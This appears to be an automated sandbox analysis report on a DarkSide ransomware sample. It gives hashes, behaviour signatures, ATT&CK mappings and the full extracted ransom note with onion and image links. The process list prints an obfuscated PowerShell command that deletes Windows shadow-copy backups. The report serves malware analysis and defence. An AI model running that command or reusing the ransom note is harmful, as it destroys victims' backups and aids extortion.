Overview

overview

10

Static

static

c718e6eaa1...dc.exe

windows7_x64

10

c718e6eaa1...dc.exe

windows10_x64

10

Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    05-01-2022 15:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe

  • Size

    260KB

  • MD5

    ce7b2f7008ab93c659494f2931160147

  • SHA1

    ed2aec7ebbcb87059b707aa98bd300c8d75f3acd

  • SHA256

    c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc

  • SHA512

    6b81bd235ad199b01ee0801a3e14544a4a720ee0609aaa0df99415dcecf10a114219a96f79f57915701b3f6576ac7259d472519964516a1d92ee4023babab0fb

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.08e0b4c3.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. DATA LEAK ---------------------------------------------- We have uploaded more than 1 TB of data from your network (Personal data of your customers, partners, personal data of your employees, as well as usernames and passwords of your bank accounts, and much more) If you do not contact us, we will publish all the data on the Internet(Media), as well as send it to all supervisory organizations in your country, your customers, partners and competitors. PROOFS (screenshots): https://ibb.co/j579HKQ https://ibb.co/HNfwBXp https://ibb.co/GTCknt9 https://ibb.co/s559W3C https://ibb.co/LNgjXNT https://ibb.co/r2QJ6fV https://ibb.co/PQBRrTn https://ibb.co/1851npy https://ibb.co/yFWcMsm https://ibb.co/1ZsVP9B https://ibb.co/3CPYZ7K What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/V1WEX06KUR61Z0JUXM0R12HXQK71TWOKVVTURZMSESZQ9V8FI49X23M1NUSCSPQO When you open our website, put the following data in the input form: Key: iI3rucYej9vtW6RUIaeuqHVOoBGRdIKxXO4Wv6Axl8jnW8iJP2eoyc7Mwg7klQDRC7uGVmGdHgDZv1zu9bEEp0Jt80cv0TlJZEXNenwMztumWSiyo4YjnQ63FcMzuCQ3dqMKarFiNRmsI1qPJaOeSSJS15KmmfYmUEaGrLt8xDraIQqGXClouzQAZmWIfxeFm1XLwy64qKLG0DpiJg0wJQKkc2Z98IQsRpAOGWTH8ksiFh4uFyXKviABrEDwdOonazjW0Rk0uOWWxmXL2FQIItr2O5vqqTacTBOLqEbm3noi70I9DchrhaVvHWPx7KVRuKKXWGtsvxUPknckBdZIot96GUFkeIaAczo55ghdJepKNszGKXnAI8WRgu1vKcy6J33p3PMcx1g5qCqOCaZv2hlqEN0quAbekEaJXVGNKGcHVDbepQ0yQeOBzz7OK4GnzChZka0Y3GCsHuSt9NoHhc9XLlxor4bHRhjhgMChls5k5xqEXiPYbXgAuaRNKMhKLs9ePKaORiWTp0x2OPCqiV5x4QhlkNYw1FkpHd2PWXi1rpbCFGfeSda !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

https://ibb.co/j579HKQ

https://ibb.co/HNfwBXp

https://ibb.co/GTCknt9

https://ibb.co/s559W3C

https://ibb.co/LNgjXNT

https://ibb.co/r2QJ6fV

https://ibb.co/PQBRrTn

https://ibb.co/1851npy

https://ibb.co/yFWcMsm

https://ibb.co/1ZsVP9B

https://ibb.co/3CPYZ7K

http://darksidfqzcuhtk2.onion/V1WEX06KUR61Z0JUXM0R12HXQK71TWOKVVTURZMSESZQ9V8FI49X23M1NUSCSPQO

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
    "C:\Users\Admin\AppData\Local\Temp\c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2288
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    2a8e26e48e324de3e4881b1c71cd83a9

    SHA1

    7bd20805009f8aa0ad63766d439f628969a19810

    SHA256

    49a6d5b9a5a3be5ec6c9c9637591dec814d79fde4ac4319e36525e2183f89488

    SHA512

    0eafb6fd87d7714f517717caf5b77097ffa090363ed72778f34bb0b158f733fb30fce7722929b3e54ca2e3a8e90961f3c81a837814d9bff770150d161cb541a3

    Download Submit
  • memory/2288-126-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-127-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-119-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-121-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-122-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-123-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-124-0x000001FA243E0000-0x000001FA24402000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2288-125-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-118-0x0000000000000000-mapping.dmp
    Download
  • memory/2288-120-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-128-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-129-0x000001FA0A110000-0x000001FA0A112000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-130-0x000001FA0A113000-0x000001FA0A115000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-131-0x000001FA24590000-0x000001FA24606000-memory.dmp
    Filesize

    472KB

    Download
  • memory/2288-132-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-142-0x000001FA0A116000-0x000001FA0A118000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2288-147-0x000001FA0A010000-0x000001FA0A012000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4016-117-0x0000000000400000-0x000000000083C000-memory.dmp
    Filesize

    4.2MB

    Download
  • memory/4016-116-0x0000000000030000-0x0000000000040000-memory.dmp
    Filesize

    64KB

    Download